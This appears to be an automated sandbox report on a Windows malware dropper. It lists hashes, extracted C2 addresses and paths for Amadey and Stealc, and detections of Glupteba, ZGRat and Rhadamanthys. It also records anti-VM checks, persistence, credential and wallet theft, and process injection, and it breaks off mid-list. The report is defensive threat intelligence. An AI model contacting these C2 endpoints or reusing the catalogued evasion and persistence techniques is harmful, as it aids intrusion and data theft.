Analysis
-
max time kernel
97s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-03-2024 12:50
Static task
static1
Behavioral task
behavioral1
Sample
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
Resource
win10v2004-20240226-en
General
-
Target
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe
-
Size
1.8MB
-
MD5
8206683bff476add6c440474ac339f1d
-
SHA1
fac4178c37f890f7ea94ed73daeecfb65d2c8405
-
SHA256
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330
-
SHA512
7203c4def8c26653147a25ef1be20aa3067aa15ebba55644213940d37843dd827301a32a209f0ce5da36ae0a5fc12c2bd398487b425db8cf5960c2969909effa
-
SSDEEP
49152:SHidTjYW5IRrKOFcEpxDY47z8P/iy65MelsGn:tfGrhFcWhY47I9gMels
Malware Config
Extracted
amadey
4.17
http://185.215.113.32
-
install_dir
00c07260dc
-
install_file
explorgu.exe
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
amadey
4.17
http://185.215.113.32
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Signatures
-
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\RDOdP6RHoxxbbJZvBW0nzcZC.exe family_zgrat_v1 C:\Users\Admin\Pictures\RDOdP6RHoxxbbJZvBW0nzcZC.exe family_zgrat_v1 behavioral2/memory/1844-175-0x00000000001A0000-0x0000000000228000-memory.dmp family_zgrat_v1 -
Glupteba payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1936-212-0x0000000002E90000-0x000000000377B000-memory.dmp family_glupteba behavioral2/memory/1936-216-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3356-221-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1936-489-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/3356-490-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid process target process PID 652 created 2832 652 RegAsm.exe sihost.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 50 4332 rundll32.exe 56 4032 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 5956 netsh.exe 3624 netsh.exe 1504 netsh.exe 2360 netsh.exe -
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 13 IoCs
Processes:
installutil.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ppD59zZZMfwbB5qsmUlSnwrk.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4UAVsGulYRjG4sEm7RXlfBA3.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cL5nZVOJI2cBv2oWIYny1inr.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d93jRdHKS1KNlGXo9tqrBrZA.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GmmkwDR3Jrq7Cg8atP2xMvc4.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ia22pMoOGpVm6ShKVC3APUEn.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N88N0pR7BLzdtkaCcLRTLFGM.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1ljJLWEznLjcnXSmT5HTFu3u.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFceYqAZ0PWtZL6nqrPbkZd2.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kkhdoZah7I3NOmsWgb1qgPlY.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i80Hrf2t3sy9X0aJBcapXU5I.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\09nnKERAyDj1ZmPXvoj8jN3b.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NJQ1tMCFjBNJgItvx5enL4NW.bat installutil.exe -
Executes dropped EXE 35 IoCs
Processes:
explorgu.exefile300un.exeq9ftR3MnZJS329eRcXixlt8T.exePlu2Yra1DcZOYdQ6S0X9boNc.exePlu2Yra1DcZOYdQ6S0X9boNc.tmpseniorflashdecompiler.exeseniorflashdecompiler.exeRDOdP6RHoxxbbJZvBW0nzcZC.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeu2tc.0.exeCT7SLFhM3W2nqplaBtJ10Bf4.exesyncUpd.exeBroomSetup.exeMWqP5e651UE727D9aFjdApYi.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeu2tc.1.exe9Z26EcBsLLBcqwnDFb4WtGQK.exeBLHU0RlzPVoO4o5n4SRKk03P.exeVEfRE0FVJNYHI28gmqs3eJxU.exeInstall.exeInstall.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.execsrss.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeinjector.exepid process 904 explorgu.exe 4720 file300un.exe 3648 q9ftR3MnZJS329eRcXixlt8T.exe 3324 Plu2Yra1DcZOYdQ6S0X9boNc.exe 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp 1556 seniorflashdecompiler.exe 3976 seniorflashdecompiler.exe 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe 1936 9YnX9TIPmfCMcUr7DOBqr4ym.exe 3356 YqnYErQDqyvWk0WfwDMsdpx4.exe 2736 u2tc.0.exe 4792 CT7SLFhM3W2nqplaBtJ10Bf4.exe 3584 syncUpd.exe 2688 BroomSetup.exe 3272 MWqP5e651UE727D9aFjdApYi.exe 3880 9YnX9TIPmfCMcUr7DOBqr4ym.exe 2800 YqnYErQDqyvWk0WfwDMsdpx4.exe 4224 BOWXpT9EMatm7T8qv30PJ1Fe.exe 1544 BOWXpT9EMatm7T8qv30PJ1Fe.exe 4756 BOWXpT9EMatm7T8qv30PJ1Fe.exe 3124 BOWXpT9EMatm7T8qv30PJ1Fe.exe 1836 BOWXpT9EMatm7T8qv30PJ1Fe.exe 5060 u2tc.1.exe 3168 9Z26EcBsLLBcqwnDFb4WtGQK.exe 4952 BLHU0RlzPVoO4o5n4SRKk03P.exe 2632 VEfRE0FVJNYHI28gmqs3eJxU.exe 1136 Install.exe 4964 Install.exe 5936 BLHU0RlzPVoO4o5n4SRKk03P.exe 6024 9Z26EcBsLLBcqwnDFb4WtGQK.exe 5560 csrss.exe 3280 Assistant_108.0.5067.20_Setup.exe_sfx.exe 6076 assistant_installer.exe 5932 assistant_installer.exe 5312 injector.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine explorgu.exe -
Loads dropped DLL 17 IoCs
Processes:
Plu2Yra1DcZOYdQ6S0X9boNc.tmprundll32.exerundll32.exeCT7SLFhM3W2nqplaBtJ10Bf4.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exerundll32.exeu2tc.0.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exeassistant_installer.exeassistant_installer.exepid process 3256 Plu2Yra1DcZOYdQ6S0X9boNc.tmp 4048 rundll32.exe 4332 rundll32.exe 4792 CT7SLFhM3W2nqplaBtJ10Bf4.exe 4792 CT7SLFhM3W2nqplaBtJ10Bf4.exe 4224 BOWXpT9EMatm7T8qv30PJ1Fe.exe 1544 BOWXpT9EMatm7T8qv30PJ1Fe.exe 4032 rundll32.exe 2736 u2tc.0.exe 2736 u2tc.0.exe 4756 BOWXpT9EMatm7T8qv30PJ1Fe.exe 3124 BOWXpT9EMatm7T8qv30PJ1Fe.exe 1836 BOWXpT9EMatm7T8qv30PJ1Fe.exe 6076 assistant_installer.exe 6076 assistant_installer.exe 5932 assistant_installer.exe 5932 assistant_installer.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe upx C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe upx C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe upx C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BOWXpT9EMatm7T8qv30PJ1Fe.exe upx behavioral2/memory/4756-615-0x0000000000FD0000-0x0000000001508000-memory.dmp upx C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
9YnX9TIPmfCMcUr7DOBqr4ym.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.exeYqnYErQDqyvWk0WfwDMsdpx4.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BLHU0RlzPVoO4o5n4SRKk03P.exe Set value (str) \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 9Z26EcBsLLBcqwnDFb4WtGQK.exe Set value (str) \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" YqnYErQDqyvWk0WfwDMsdpx4.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
BOWXpT9EMatm7T8qv30PJ1Fe.exeBOWXpT9EMatm7T8qv30PJ1Fe.exedescription ioc process File opened (read-only) \??\D: BOWXpT9EMatm7T8qv30PJ1Fe.exe File opened (read-only) \??\F: BOWXpT9EMatm7T8qv30PJ1Fe.exe File opened (read-only) \??\D: BOWXpT9EMatm7T8qv30PJ1Fe.exe File opened (read-only) \??\F: BOWXpT9EMatm7T8qv30PJ1Fe.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 17 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exeexplorgu.exepid process 1884 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe 904 explorgu.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
file300un.exeRDOdP6RHoxxbbJZvBW0nzcZC.exedescription pid process target process PID 4720 set thread context of 720 4720 file300un.exe installutil.exe PID 1844 set thread context of 652 1844 RDOdP6RHoxxbbJZvBW0nzcZC.exe RegAsm.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
9Z26EcBsLLBcqwnDFb4WtGQK.exe9YnX9TIPmfCMcUr7DOBqr4ym.exeYqnYErQDqyvWk0WfwDMsdpx4.exeBLHU0RlzPVoO4o5n4SRKk03P.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN 9Z26EcBsLLBcqwnDFb4WtGQK.exe File opened (read-only) \??\VBoxMiniRdrDN 9YnX9TIPmfCMcUr7DOBqr4ym.exe File opened (read-only) \??\VBoxMiniRdrDN YqnYErQDqyvWk0WfwDMsdpx4.exe File opened (read-only) \??\VBoxMiniRdrDN BLHU0RlzPVoO4o5n4SRKk03P.exe -
Drops file in Windows directory 10 IoCs
Processes:
YqnYErQDqyvWk0WfwDMsdpx4.exeBLHU0RlzPVoO4o5n4SRKk03P.exe9Z26EcBsLLBcqwnDFb4WtGQK.exeschtasks.exe09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe9YnX9TIPmfCMcUr7DOBqr4ym.exedescription ioc process File created C:\Windows\rss\csrss.exe YqnYErQDqyvWk0WfwDMsdpx4.exe File opened for modification C:\Windows\rss BLHU0RlzPVoO4o5n4SRKk03P.exe File created C:\Windows\rss\csrss.exe BLHU0RlzPVoO4o5n4SRKk03P.exe File created C:\Windows\rss\csrss.exe 9Z26EcBsLLBcqwnDFb4WtGQK.exe File created C:\Windows\Tasks\bNoYxGgNiGReyhFIfY.job schtasks.exe File opened for modification C:\Windows\rss 9Z26EcBsLLBcqwnDFb4WtGQK.exe File created C:\Windows\Tasks\explorgu.job 09bd814fb1f23bc3d3ca5e4b2a03e95cc41967506b5b190b823c31d4db818330.exe File opened for modification C:\Windows\rss YqnYErQDqyvWk0WfwDMsdpx4.exe File opened for modification C:\Windows\rss 9YnX9TIPmfCMcUr7DOBqr4ym.exe File created C:\Windows\rss\csrss.exe 9YnX9TIPmfCMcUr7DOBqr4ym.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5164 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5068 652 WerFault.exe RegAsm.exe 4500 652 WerFault.exe RegAsm.exe 5040 3648 WerFault.exe q9ftR3MnZJS329eRcXixlt8T.exe 4876 2736 WerFault.exe u2tc.0.exe 2780 3584 WerFault.exe syncUpd.exe -
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe nsis_installer_2 C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe nsis_installer_2 C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u2tc.1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2tc.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2tc.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2tc.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2tc.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2tc.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2tc.0.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4276 schtasks.exe 6076 schtasks.exe 1548 schtasks.exe 5536 schtasks.exe 3700 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
9YnX9TIPmfCMcUr7DOBqr4ym.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeYqnYErQDqyvWk0WfwDMsdpx4.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" YqnYErQDqyvWk0WfwDMsdpx4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" YqnYErQDqyvWk0WfwDMsdpx4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" YqnYErQDqyvWk0WfwDMsdpx4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" YqnYErQDqyvWk0WfwDMsdpx4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" YqnYErQDqyvWk0WfwDMsdpx4.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" YqnYErQDqyvWk0WfwDMsdpx4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" 9YnX9TIPmfCMcUr7DOBqr4ym.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" YqnYErQDqyvWk0WfwDMsdpx4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created 